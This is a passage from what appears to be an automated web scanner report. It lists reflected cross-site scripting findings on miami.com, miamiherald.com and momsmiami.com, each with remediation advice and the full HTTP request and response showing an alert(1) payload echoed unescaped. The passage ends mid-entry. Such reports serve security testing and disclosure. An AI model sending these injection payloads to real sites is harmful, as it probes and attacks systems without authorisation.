Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /nightlife?b6577"-alert(1)-"5b0a69b1321=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
ahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20267501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|nightlife?b6577"-alert(1)-"5b0a69b1321=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.228. http://www.miami.com/restaurants [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4407a"-alert(1)-"6f919770c59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /restaurants?4407a"-alert(1)-"6f919770c59=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
oo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20262001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|restaurants?4407a"-alert(1)-"6f919770c59=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.229. http://www.miami.com/see-do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /see-do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9e5"-alert(1)-"44afdd7ab8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /see-do?7f9e5"-alert(1)-"44afdd7ab8e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20378001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|see-do?7f9e5"-alert(1)-"44afdd7ab8e=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.230. http://www.miami.com/shopping [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /shopping

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c96d"-alert(1)-"25b0154ec80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /shopping?7c96d"-alert(1)-"25b0154ec80=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
yahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20307001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|shopping?7c96d"-alert(1)-"25b0154ec80=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.231. http://www.miamiherald.com/reg-bin/tint.cgi [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miamiherald.com
Path:   /reg-bin/tint.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b7'%3balert(1)//6fc0ef752d5 was submitted in the version parameter. This input was echoed as 1f1b7';alert(1)//6fc0ef752d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /reg-bin/tint.cgi?mode=edit&version=newsletter1f1b7'%3balert(1)//6fc0ef752d5 HTTP/1.1
Host: www.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mi__classads_featured=o7p1289710800;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:53:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:53:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41352

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new Date().getTime(),
   acctId:'D3FD89',
   pgId:'v-newsletter1f1b7';alert(1)//6fc0ef752d5',
   grpId:'Miami Herald'
};


var gomez=gomez?gomez:{};gomez.h3=function(d, s){for(var p in s){d[p]=s[p];}return d;};gomez.h3(gomez,{b3:function(r){if(r<=0)return false;return Math.random()<=r&&r;},b
...[SNIP]...

2.232. http://www.momsmiami.com/ [blog_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3350"><script>alert(1)</script>5cb7dc9a388 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=be2dd0fac0f368778f3c7248893a9bed; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388">
...[SNIP]...

2.233. http://www.momsmiami.com/ [link_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the link_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8219c"><script>alert(1)</script>62f20d5abff was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=birthday_pages&link_id=298219c"><script>alert(1)</script>62f20d5abff HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=31ab67d680166369343db82ebda09a1e; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- birthday -->
<!--
...[SNIP]...
<a href="/?a=email_birthday_party&amp;link_id=298219c"><script>alert(1)</script>62f20d5abff" title="Email a friend." rel="nofollow">
...[SNIP]...

2.234. http://www.momsmiami.com/ [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaa2"><script>alert(1)</script>f0ceec3a72 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=5c7e56c99fdb3fbe7d618e18c775ce9b; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&amp;blog_id=3035">
...[SNIP]...

2.235. http://www.momsmiami.com/forum/memberlist.php [blog_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c09"><script>alert(1)</script>51fe99986e0 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:55:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=ecca7e3c999e0c7d65e37d0d501e78b9; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41069


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=347551c09"><script>alert(1)</script>51fe99986e0">
...[SNIP]...

2.236. http://www.momsmiami.com/forum/memberlist.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c174"><script>alert(1)</script>28e9ec410ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:56:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=01cb0feaece59c23a875621186d5dce9; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475">
...[SNIP]...

2.237. http://www.momsmiami.com/forum/memberlist.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e94"><script>alert(1)</script>ee4ccd85f90 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:55:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=1076c6eb78094a4ffd21ac7758d91d47; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&amp;blog_id=3475">
...[SNIP]...

2.238. http://www.momsmiami.com/index.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /index.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84690"><script>alert(1)</script>3bc91134198 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=profile&t=blog84690"><script>alert(1)</script>3bc91134198&u=2&date=new HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=02be0ca3430688abfa7afa4a6f32257f; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog84690"><script>alert(1)</script>3bc91134198&amp;blog_id=3475">
...[SNIP]...

2.239. http://www.momsmiami.com/view_photo.php [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /view_photo.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a354"><script>alert(1)</script>f9d100f9d13 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&photo=1162&t=home&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=64b47022dec6026acb55b6f3b632c629; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Content-Length: 4260
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="/view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&amp;photo=1123&amp;t=home">
...[SNIP]...

2.240. http://www.momsmiami.com/view_photo.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /view_photo.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d36a"><script>alert(1)</script>8c772da80c8 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view_photo.php?c=805&photo=1162&t=home3d36a"><script>alert(1)</script>8c772da80c8&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=25c766b0eb9141346ab0bc08977004e4; expires=Mon, 14-Nov-2011 22:54:47 GMT; path=/; domain=momsmiami.com; HttpOnly
Content-Length: 4468
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="/view_photo.php?c=805&amp;photo=1163&amp;t=home3d36a"><script>alert(1)</script>8c772da80c8">
...[SNIP]...

2.241. http://www.paperg.com/jsfb/embed.php [514e9 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

